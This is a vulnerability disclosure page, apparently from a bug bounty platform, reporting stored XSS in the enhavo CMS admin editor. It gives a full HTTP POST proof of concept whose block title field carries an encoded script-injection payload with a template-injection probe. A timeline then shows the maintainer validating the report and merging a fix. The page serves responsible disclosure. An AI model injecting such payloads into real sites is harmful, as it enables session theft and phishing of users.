Store XSS in enhavo/enhavo

Valid

Reported on

May 1st 2022


Description

Phishing and stealing users through vulnerabilities and accessing users' personal information

Proof of Concept

POST /admin/enhavo/article/article/update/5?view_id=6 HTTP/1.1
Host: demo.enhavo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: https://demo.enhavo.com/admin/enhavo/article/article/update/5?view_id=6
Content-Type: application/x-www-form-urlencoded
Content-Length: 2555
Cookie: PHPSESSID=etbamrm56rjoju30nfffvjr3h6
Connection: close
Upgrade-Insecure-Requests: 1

article%5Btitle%5D=Cats&article%5Bteaser%5D=%3Cp%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3ELorem+ipsum+dolor+sit+amet%2C+consetetur+sadipscing+elitr%2C+sed+diam+nonumy+eirmod+tempor+invidunt+ut+labore+et+dolore+magna+aliquyam+erat%E3%80%821111%3C%2Fspan%3E%3C%2Fspan%3E%3C%2Fp%3E&article%5Bpicture%5D%5B0%5D%5Bfilename%5D=article-img-05.png&article%5Bpicture%5D%5B0%5D%5Border%5D=0&article%5Bpicture%5D%5B0%5D%5Bparameters%5D%5Balt%5D=&article%5Bpicture%5D%5B0%5D%5Bparameters%5D%5Btitle%5D=&article%5Bpicture%5D%5B0%5D%5Bid%5D=5&files=&article%5Bcategories%5D%5B%5D=1&article%5Btags%5D=&article%5Bpublication_date%5D=30.04.2022+22%3A01&article%5Bpublished_until%5D=&article%5Bpublic%5D=true&article%5Bcontent%5D%5Bchildren%5D%5B0%5D%5Bposition%5D=1&article%5Bcontent%5D%5Bchildren%5D%5B0%5D%5Bname%5D=text&article%5Bcontent%5D%5Bchildren%5D%5B0%5D%5Bblock%5D%5Btitle%5D%5Btext%5D=%27%22%3E%3CiMg+SrC%3Dx+OnErRoR%3Dalert%289999%29%3E%7B%7B7*7%7D%7D&article%5Bcontent%5D%5Bchildren%5D%5B0%5D%5Bblock%5D%5Btitle%5D%5Btag%5D=&article%5Bcontent%5D%5Bchildren%5D%5B0%5D%5Bblock%5D%5Btext%5D=%3Cp%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3ELorem+ipsum+dolor+sit+amet%2C+consetetur+sadipscing+elitr%2C+sed+diam+nonumy+eirmod+tempor+invidunt+ut+labore+et+dolore+magna+aliquyam+erat%2C+sed+diam+voluptua%E3%80%82%3C%2Fspan%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3E%E5%9C%A8+vero+eos+et+accusam+et+justo+duo+dolores+et+ea+rebum%E3%80%82%3C%2Fspan%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3EStet+clita+kasd+gubergren%2C+no+sea+takimata+sanctus+est+Lorem+ipsum+dolor+sit+amet%E3%80%82%3C%2Fspan%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3ELorem+ipsum+dolor+sit+amet%2C+consetetur+sadipscing+elitr%2C+sed+diam+nonumy+eirmod+tempor+invidunt+ut+labore+et+dolore+magna+aliquyam+erat%2C+sed+diam+voluptua%E3%80%82%3C%2Fspan%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3E%E5%9C%A8+vero+eos+et+accusam+et+justo+duo+dolores+et+ea+rebum%E3%80%82%3C%2Fspan%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3EStet+clita+kasd+gubergren%2C+no+sea+takimata+sanctus+est+Lorem+ipsum+dolor+sit+amet%E3%80%82%3C%2Fspan%3E%3C%2Fspan%3E%3C%2Fp%3E&article%5Bpage_title%5D=&article%5Bslug%5D=cats&article%5Bmeta_description%5D=&article%5Bpriority%5D=0.5&article%5Bchange_frequency%5D=never&article%5BnoIndex%5D=false&article%5BnoFollow%5D=false&article%5B_token%5D=msmuiOw45V3PERHhmxPXHuqkVoOcKVLypgkuOO5KPzY

Impact

Through this vulnerability, the user is phished and the user's personal privacy information is stolen

We are processing your report and will contact the enhavo team within 24 hours. a month ago
wind226 modified the report
a month ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
We have contacted a member of the enhavo team and are waiting to hear back 25 days ago
enhavo/enhavo maintainer modified the Severity from High to Low 25 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
enhavo/enhavo maintainer validated this vulnerability 25 days ago
wind226 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
enhavo/enhavo maintainer confirmed that a fix has been merged on 33c68b 25 days ago
The fix bounty has been dropped
to join this conversation